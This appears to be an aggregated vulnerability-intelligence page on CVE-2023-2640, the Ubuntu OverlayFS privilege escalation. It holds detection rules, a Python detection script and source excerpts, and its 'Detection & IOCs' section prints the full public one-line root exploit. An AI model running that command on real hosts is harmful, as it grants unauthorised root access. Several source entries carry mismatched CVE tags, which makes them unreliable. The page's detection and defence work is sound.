# CVE-2023-2640
Published: 2023-07-26
Priority: P1 · 79 · high · CVSS 3.1 base score 7.8
CVSS vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploited in the wild (ITW) · exploit available · listed in VulnCheck KEV
EPSS: 15.78% (96.5th percentile)
On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
## Affected (31 ranges, showing 25)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| debian | linux | — | — |
| ubuntu | linux | — | — |
| ubuntu | linux-aws | — | — |
| ubuntu | linux-aws-5.15 | — | — |
| ubuntu | linux-aws-fips | — | — |
| ubuntu | linux-azure | — | — |
| ubuntu | linux-azure-5.15 | — | — |
| ubuntu | linux-azure-fips | — | — |
| ubuntu | linux-fips | — | — |
| ubuntu | linux-gcp | — | — |
| ubuntu | linux-gcp-5.15 | — | — |
| ubuntu | linux-gcp-fips | — | — |
| ubuntu | linux-gke | — | — |
| ubuntu | linux-gkeop | — | — |
| ubuntu | linux-hwe-5.15 | — | — |
| ubuntu | linux-ibm | — | — |
| ubuntu | linux-ibm-5.15 | — | — |
| ubuntu | linux-intel-iot-realtime | — | — |
| ubuntu | linux-intel-iotg | — | — |
| ubuntu | linux-intel-iotg-5.15 | — | — |
| ubuntu | linux-kvm | — | — |
| ubuntu | linux-lowlatency | — | — |
| ubuntu | linux-lowlatency-hwe-5.15 | — | — |
| ubuntu | linux-nvidia | — | — |
## Detection & IOCs (extracted from sources)
Command (the public one-line exploit as recorded by the sources): `unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'`
- Detect use of `unshare` with `-rm` flags combined with overlayfs mount operations (lowerdir/upperdir/workdir); this is the core primitive of the CVE-2023-2640 one-line exploit.
- Alert on `setcap cap_setuid+eip` being called on a copied interpreter binary (e.g., python3) inside a user-created directory; this indicates capability planting via overlayfs copy-up.
- Monitor for creation of SUID bash binaries in world-writable temp directories (e.g., /var/tmp/bash with permissions -rwsr-xr-x owned by root), which indicates successful privilege escalation.
- Alert on overlayfs mount operations where files with capabilities (CAP_SYS_ADMIN, CAP_SETUID) in the lower directory are copied to the upper directory; this is the core mechanism of both CVE-2023-2640 and CVE-2023-32629.
- On July 28, 2023, a public one-line exploit for CVE-2023-2640 was disclosed via Twitter; monitor threat intel feeds for weaponized PoCs and scan for the exploit pattern in process command lines.
- CVE-2023-2640 is exploitable when the Ubuntu kernel carries both commit c914c0e27eb0 and the SAUCE patch "overlayfs: Skip permission checking for trusted.overlayfs.* xattrs"; check kernel version and patch state to identify vulnerable hosts.
- The vulnerability requires the Ubuntu kernel to carry BOTH commit c914c0e27eb0 AND the Ubuntu-specific SAUCE patch for overlayfs xattr permission skipping; vanilla upstream kernels are not affected.
- Containers running on vulnerable Ubuntu hosts are also at risk, not just the host itself; container workloads on Docker and Kubernetes are exploitable under certain conditions.
- The exploit was demonstrated on Ubuntu 22.04.3 LTS running kernel 6.2.0-25-generic; patch assessment should include this specific kernel version.
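As an added illustration (not code from this page or its sources), the following Python turns the detection notes above into checks over process-execution and file-creation telemetry. The event layout (dicts with `type`, `cmdline` or `path`/`mode`/`uid`), the rule names and the sample events are assumptions to map onto your own auditd or EDR fields.

```python
"""Heuristic checks for the GameOver(lay) / CVE-2023-2640 exploit pattern.

Added example, not code from the page's sources.  The event layout
(dicts with "type", "cmdline" or "path"/"mode"/"uid") is an assumption;
map your own auditd or EDR fields onto it before use.
"""
import re
import stat
from dataclasses import dataclass
from typing import List

# Where a capability-bearing interpreter legitimately lives; a setcap on a
# binary outside these paths (e.g. a copy in a user-created dir) is flagged.
SYSTEM_BIN_DIRS = ("/usr/bin/", "/bin/", "/usr/sbin/", "/sbin/", "/usr/local/bin/")
# World-writable locations where a root-owned SUID shell should never appear.
WRITABLE_TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


# `unshare` followed by its option tokens (stops at the first non-option word).
_UNSHARE_RE = re.compile(r"(?:^|[\s;&|(])unshare\s+((?:-\S+\s+)+)")
# An overlay mount anywhere in the command line, whatever the option order.
_OVERLAY_MOUNT_RE = re.compile(r"\bmount\s+(?:\S+\s+)*-t\s+overlay\b")
# setcap granting cap_setuid to some target path.
_SETCAP_RE = re.compile(r"\bsetcap\s+(\S*cap_setuid\S*)\s+(\S+)")
# chmod that sets the setuid bit, symbolically (u+s) or numerically (4xxx/6xxx).
_CHMOD_SUID_RE = re.compile(r"\bchmod\s+(?:[ugoa]*\+[rwx]*s[rwx]*|[0-7]*[4-7][0-7]{3})\s+(\S+)")


def _requests_user_and_mount_ns(flags: str) -> bool:
    """True when the unshare options ask for both a user and a mount namespace."""
    tokens = flags.split()
    short = "".join(t[1:] for t in tokens if t.startswith("-") and not t.startswith("--"))
    longf = {t for t in tokens if t.startswith("--")}
    user_ns = "r" in short or "U" in short or bool(longf & {"--map-root-user", "--user"})
    mount_ns = "m" in short or "--mount" in longf
    return user_ns and mount_ns


def check_cmdline(cmdline: str) -> List[Finding]:
    """Apply the three command-line heuristics from the detection notes."""
    findings: List[Finding] = []
    m = _UNSHARE_RE.search(cmdline)
    if (m and _requests_user_and_mount_ns(m.group(1))
            and _OVERLAY_MOUNT_RE.search(cmdline)
            and all(k in cmdline for k in ("lowerdir=", "upperdir=", "workdir="))):
        findings.append(Finding("unshare_userns_overlay_mount", m.group(0).strip()))
    for caps, target in _SETCAP_RE.findall(cmdline):
        if not target.startswith(SYSTEM_BIN_DIRS):
            findings.append(Finding("setcap_cap_setuid_outside_system_bin", f"setcap {caps} {target}"))
    for target in _CHMOD_SUID_RE.findall(cmdline):
        if target.startswith(WRITABLE_TMP_DIRS):
            findings.append(Finding("suid_set_in_world_writable_dir", f"chmod setuid on {target}"))
    return findings


def check_file_record(path: str, mode: int, uid: int) -> List[Finding]:
    """Flag a root-owned, world-executable setuid file in a temp dir (the -rwsr-xr-x /var/tmp/bash case)."""
    if (uid == 0 and mode & stat.S_ISUID and mode & stat.S_IXOTH
            and path.startswith(WRITABLE_TMP_DIRS)):
        return [Finding("root_suid_binary_in_tmp", f"{path} mode {oct(mode & 0o7777)} uid 0")]
    return []


def scan(events) -> List[Finding]:
    """Run every event through the matching check and collect the findings."""
    out: List[Finding] = []
    for ev in events:
        if ev["type"] == "exec":
            out.extend(check_cmdline(ev["cmdline"]))
        elif ev["type"] == "file":
            out.extend(check_file_record(ev["path"], ev["mode"], ev["uid"]))
    return out


# Constructed sample telemetry (not real logs): one exploit-shaped chain with the
# unshare/setcap/overlay primitives, two benign look-alikes, and two file records.
SAMPLE_EVENTS = [
    {"type": "exec", "cmdline": 'unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && '
                                'setcap cap_setuid+eip l/python3 && mount -t overlay overlay '
                                '-o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"'},
    {"type": "exec", "cmdline": "mount -t overlay overlay -o lowerdir=/var/lib/docker/overlay2/l/X,"
                                "upperdir=/var/lib/docker/overlay2/a/diff,workdir=/var/lib/docker/"
                                "overlay2/a/work /var/lib/docker/overlay2/a/merged"},
    {"type": "exec", "cmdline": "setcap cap_net_bind_service=+ep /usr/bin/node"},
    {"type": "file", "path": "/var/tmp/bash", "mode": 0o104755, "uid": 0},
    {"type": "file", "path": "/usr/bin/sudo", "mode": 0o104755, "uid": 0},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.evidence}")
```

The Docker overlay mount and the `cap_net_bind_service` setcap are deliberately left unflagged, so the rules key on the combination of primitives rather than on overlayfs use alone.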
## CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| osv | — | 7.8 | HIGH | — |
| vulncheck | — | 7.8 | HIGH | — |
| vendor_debian | — | 7.8 | LOW | — |
| vendor_redhat | — | 7.8 | HIGH | — |
| vendor_ubuntu | — | 7.8 | HIGH | — |
## Sources

### Ubuntu: Linux kernel (Oracle) vulnerabilities
vendor_ubuntu · 2026-06-16 · CVSS 7.8 · CVE-2024-35862 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.

Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. A local attacker could possibly use this to gain elevated privileges. (CVE-2023-2640)

Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. A local attacker could possibly use this to gain elevated privileges. (CVE-2023-32629)

Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following
### Ubuntu: Linux kernel (GCP) vulnerabilities
vendor_ubuntu · 2026-05-22 · CVSS 7.8 · CVE-2023-2640 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.
### Ubuntu: Linux kernel (Xilinx ZynqMP) vulnerabilities
vendor_ubuntu · 2026-05-19 · CVSS 7.8 · CVE-2026-23093 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.
### Ubuntu: Linux kernel (Azure) vulnerabilities
vendor_ubuntu · 2026-05-11 · CVSS 7.8 · CVE-2026-23273 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.
### Ubuntu: Linux kernel vulnerabilities
vendor_ubuntu · 2026-05-07 · CVSS 7.8 · CVE-2023-2640 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.
### Ubuntu: Linux kernel (OEM) vulnerabilities
vendor_ubuntu · 2023-08-11 · CVSS 7.1 · CVE-2023-38430 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.

It was discovered that the NTFS file system implementation in the Linux kernel did not properly check buffer indexes in certain situations, leading to an out-of-bounds read vulnerability. A local attacker could possibly use this to expose sensitive information (kernel memory). (CVE-2022-48502)

Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. A local attacker could possibly use this to gain elevated privileges. (CVE-2023-2640)

It was discovered that a race condition existed in the f2fs file system in the Linux kernel, leading to a null pointer dereferenc
### Ubuntu: Linux kernel vulnerabilities
vendor_ubuntu · 2023-07-27 · CVSS 7.1 · CVE-2023-31248 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.

It was discovered that the NTFS file system implementation in the Linux kernel did not properly check buffer indexes in certain situations, leading to an out-of-bounds read vulnerability. A local attacker could possibly use this to expose sensitive information (kernel memory). (CVE-2022-48502)

Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. A local attacker could possibly use this to gain elevated privileges. (CVE-2023-2640)

It was discovered that the IP-VLAN network driver for the Linux kernel did not properly initialize memory in some situations, leading t
### Ubuntu: Linux kernel (OEM) vulnerabilities
vendor_ubuntu · 2023-07-25 · CVSS 5.5 · CVE-2023-21106 [MEDIUM]
Summary: Several security issues were fixed in the Linux kernel.

It was discovered that the network queuing discipline implementation in the Linux kernel contained a null pointer dereference in some situations. A local attacker could use this to cause a denial of service (system crash). (CVE-2022-47929)

It was discovered that a race condition existed in Adreno GPU DRM driver in the Linux kernel, leading to a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2023-21106)

Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. A local attacker could possibly use this t
### Ubuntu: Linux kernel vulnerabilities
vendor_ubuntu · 2023-07-25 · CVSS 7.8 · CVE-2023-35001 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.

Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. A local attacker could possibly use this to gain elevated privileges. (CVE-2023-2640)

It was discovered that the IP-VLAN network driver for the Linux kernel did not properly initialize memory in some situations, leading to an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-3090)

Mingi Cho discovered that the netfilter subsystem in the Linux kernel did not properly validate the status of a nft chain while per
### Red Hat: kernel: overlayfs: In Ubuntu skip permission checking for trusted.overlayfs.* xattrs
vendor_redhat · 2023-07-06 · CVSS 7.8 · CVE-2023-2640 [HIGH]

A flaw was found in the Linux Kernel where the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. This flaw allows a local attacker to gain elevated privileges due to skipped permission in checking for trusted.overlayfs.* xattrs (CVE-2023-2640). There is a similar local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_m
### Red Hat: kernel: overlayfs: In Ubuntu skip permission checking for trusted.overlayfs.* xattrs
vendor_redhat · 2023-07-06 · CVSS 7.8 · CVE-2023-32629 [HIGH]
Local privilege escalation vulnerability in Ubuntu kernels: overlayfs ovl_copy_up_meta_inode_data skips permission checks when calling ovl_do_setxattr.

A flaw was found in the Linux Kernel where the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. This flaw allows a local attacker to gain elevated privileges due to skipped permission in checking for trusted.overlayfs.* xattrs (CVE-2023-2640). There is a similar local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data due to skipped permission checks when calling ovl_do_setxattr on Ubuntu kernels (CVE-2023-32629).
Package: kernel (R
### Debian: CVE-2023-2640: linux
vendor_debian · 2023 · CVSS 7.8 · CVE-2023-2640 [HIGH]
Scope: local
Release status:
- bookworm: resolved
- bullseye: resolved
- forky: resolved
- sid: resolved
- trixie: resolved
### OSV: linux-oem-6.1 vulnerabilities
osv · 2023-08-11 · CVSS 7.1 · CVE-2022-48502 [HIGH]
### OSV: linux-aws-5.19, linux-gcp-5.19, linux-hwe-5.19 vulnerabilities
osv · 2023-07-27 · CVSS 7.1 · CVE-2022-48502 [HIGH]
### GHSA: GHSA-38f7-vv5r-859m
ghsa_unreviewed · 2023-07-26 · CVE-2023-2640 [HIGH] · CWE-863
### OSV: linux-oem-6.0 vulnerabilities
osv · 2023-07-25 · CVSS 5.5 · CVE-2022-47929 [MEDIUM]
### OSV: CVE-2023-2640
osv · 2023-06-06 · CVSS 7.8 · CVE-2023-2640 [HIGH]
### VulnCheck: canonical ubuntu_linux Incorrect Authorization
vulncheck · 2023 · CVSS 7.8 · CVE-2023-2640 [HIGH]
Affected: canonical ubuntu_linux
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://securelist.com/vulnerability-exploit-report-q2-2024/113455/; https://securelist.com/exploits-and-vulnerabilities-q3-2024/114839/
Exploit PoC: https://vulncheck.com/xdb/8c496ca56767; https://vulncheck.com/xdb/16afc028b0b7; https
### Metasploit: GameOver(lay) Privilege Escalation and Container Escape
metasploit · CVSS 7.8 · CVE-2021-3493 [HIGH]

This module exploits the use of unsafe functions in a number of Ubuntu kernels utilizing vulnerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent changes to the kernel by the Ubuntu development team, __vfs_setxattr_noperm is called during ovl_do_setxattr without calling the intermediate safety function vfs_setxattr. Ultimately this module allows for root access to be achieved by writing setuid capabilities to a file which are not sanitized after being unioned with the upper mounted directory.
### Nuclei: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
nuclei · CVSS 7.8 · CVE-2023-2640 [HIGH]

A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.

Template (truncated as extracted):
```yaml
id: CVE-2023-2640

info:
  name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
  author: princechaddha
  severity: high
  description: |
    A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
  impact: |
    An attacker with local access can gain elevated privileges on the affe
```
### Wiz: Kubernetes Security Context for Secure Container Workloads
blogs_wiz · 2025-09-25

A Kubernetes security context defines the runtime privileges and access controls for pods and containers, making it one of the most critical levers for enforcing least privilege and reducing attack surface. By carefully configuring security contexts, you can increase the security posture of your workloads, mitigate potential threats, and simplify compliance.

#### The benefits of implementing security contexts
Here are some key advantages of leveraging Kubernetes security contexts:

#### Enhanced security posture
Security contexts provide strict, runtime-level controls over containers and pods, including running processes as non-root users, restricting access to the root filesystem, and limiting Linux capabilities. These security measures limit privilege
### Wiz: What Is Privilege Escalation? Types and Prevention Strategies
blogs_wiz · 2025-03-18

Privilege escalation is when an attacker exploits weaknesses in your environment or infrastructure to gain higher access and control within a system or network.

Most organizations take multiple measures to tighten security, including defining different privilege levels for different user accounts. For example, you wouldn't give ordinary users access to your most confidential, business-critical files. These security measures frustrate attackers who access your system through lower-privileged user accounts, so they try to gain more privileges in order to achieve malicious goals such as exfiltrating or encrypting your data.

#### Incident Response Playbook Template: Privilege Escalation in EKS
Detect, investigate, and respond to privilege escalation in Amazon EKS clusters with this comprehensi
### Securelist: Exploits and vulnerabilities in Q3 2024
blogs_securelist · 2024-12-06 · CVSS 8.1 · CVE-2024-47177 [HIGH]

Table of contents:
- Statistics on registered vulnerabilities
- Exploitation statistics
  - Windows and Linux vulnerability exploitation
  - Most prevalent exploits
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
  - CVE-2024-47177 (CUPS filters)
  - CVE-2024-38112 (MSHTML Spoofing)
  - CVE-2024-6387 (regreSSHion)
  - CVE-2024-3183 (Free IPA)
  - CVE-2024-45519 (Zimbra)
  - CVE-2024-5290 (Ubuntu wpa_supplicant)
- Conclusion and advice

Authors: Alexander Kolesnikov

Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Co
### Wiz: What Is Cloud Identity Security?
blogs_wiz · 2024-10-18

#### What is cloud identity security?
Cloud identity security is the practice of safeguarding digital identities and the sensitive cloud infrastructure and data they gatekeep from unauthorized access and misuse. The practice encompasses identity and access control mechanisms to allow or disallow access to human users (e.g., developers), service accounts, application identities, and other entities interacting with cloud services.

#### The shift from traditional to cloud identity management
Traditionally, identity security
### Securelist: Exploits and vulnerabilities in Q2 2024
blogs_securelist · 2024-08-21 · CVSS 7.8 · CVE-2024-26169 [HIGH]

Table of contents:
- Statistics on registered vulnerabilities
- Vulnerability exploitation statistics
  - Windows and Linux vulnerability exploitation
  - Most common exploits
- Vulnerability exploitation in APT attacks
- Exploiting vulnerable drivers to attack operating systems
  - BYOVD attack tools
- Interesting vulnerabilities
  - CVE-2024-26169 (WerKernel.sys)
  - CVE-2024-26229 (csc.sys)
  - CVE-2024-4577 (PHP CGI)
- Takeaways and recommendations

Authors: Vitaly Morgunov, Alexander Kolesnikov

Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not h
### Wiz: #8 - GameOverlay – privilege escalation vulnerabilities in Ubuntu (podcast)
blogs_wiz · 2023-08-29 · CVSS 7.8 · [HIGH]

🍿🤏 Everything you need to know about this month's cloud security drama in the latest "Crying Out Cloud" episode!

In this edition, we explore THREE captivating stories 📚🔍
1. "GameOverlay" unveiled: Ubuntu's privilege escalation vulnerabilities 😱. Wiz Research uncovered a pair of vulnerabilities that's affecting 40% of Ubuntu cloud machines! We've got the scoop on what you must know.
2. Unmasking "P2PInfect": The botnet targeting Redis! 🤖 Ever wondered how a botnet hijacks your exposed Redis instances? Let's get into the nitty-gritty of this attack and find out how to defend your environment.
3. Jumpcloud's dance with North Korea: A supply chain saga 🕊️. Join us as we uncover the tale of Jumpcloud's b
Wiz
Crying Out Cloud - July Newsletter | Wiz
blogs_wiz·2023-08-01·CVSS 4.3
CVE-2023-2640 [MEDIUM] Crying Out Cloud - July Newsletter | Wiz
Welcome back! In this edition, we bring you the latest in cloud security – crucial vulnerabilities, exclusive data, and noteworthy incidents. Stay informed and stay secure. Let's delve in.
Here are our cloud security highlights for July!
## ✨ Highlights
## GameOver(lay): local privilege escalation vulnerabilities in Ubuntu Linux
Wiz Research discovered CVE-2023-2640 and CVE-2023-32629, two easy-to-exploit privilege escalation vulnerabilities in the OverlayFS module in Ubuntu affecting 40% of Ubuntu cloud workloads.
CVE-2023-2640 and CVE-2023-32629 were found in the OverlayFS module in Ubuntu, which is a widely used Linux filesystem that became highly popular with the rise of containers as its features enable the deployment of dynamic filesystems based on pre-built images. Successful
Wiz
GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog
blogs_wiz·2023-07-27·CVSS 7.8
CVE-2023-2640 [HIGH] GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog
CVE-2023-2640 and CVE-2023-32629 were found in the OverlayFS module in Ubuntu, which is a widely used Linux filesystem that became highly popular with the rise of containers, as its features enable the deployment of dynamic filesystems based on pre-built images. OverlayFS serves as an attractive attack surface because it has a history of numerous logical vulnerabilities that were easy to exploit. This makes the newly discovered vulnerabilities especially risky, given that the exploits for the past OverlayFS vulnerabilities work out of the box without any changes.
The two vulnerabilities are exclusive to Ubuntu because Ubuntu introduced several changes to the OverlayFS module in 2018. These modifications did not pose any risks at the time. In 2020, a security vulnerability was discovered and patched in
Crowdstrike
New Exploit: Rooting Non-Root Containers with GameOver(lay)
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] New Exploit: Rooting Non-Root Containers with GameOver(lay)
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
CTF
Analytics / README
ctf_writeups·CVSS 9.8
CVE-2023-38646 [CRITICAL] Analytics / README
# Analytics - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, and `3000`.
***User***: Identified the subdomain `data.analytics.htb` hosting Metabase. Exploited `CVE-2023-38646` to acquire a reverse shell as the `metabase` user. Discovered the password of the `metalytics` user in the `env`.
***Root***: Leveraged the OS version to execute GameOver(lay) Ubuntu Privilege Escalation, resulting in obtaining a `root` shell.
## Analytics Solution
### User
Let's begin by using `nmap` to scan the target machine:
```console
┌─[evyatar9@parrot]─[/hackthebox/Analytics]
└──╼ $ nmap -sV -sC -oA nmap/Analytics 10.10.11.233
# Nmap 7.93 scan initiated Sat Jan 6 23:15:29 2024 as:
```
References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640
- https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html
- https://ubuntu.com/security/notices/USN-6250-1
- https://wiz.io/blog/ubuntu-overlayfs-vulnerability
Published: 2023-07-26 · Exploited in the wild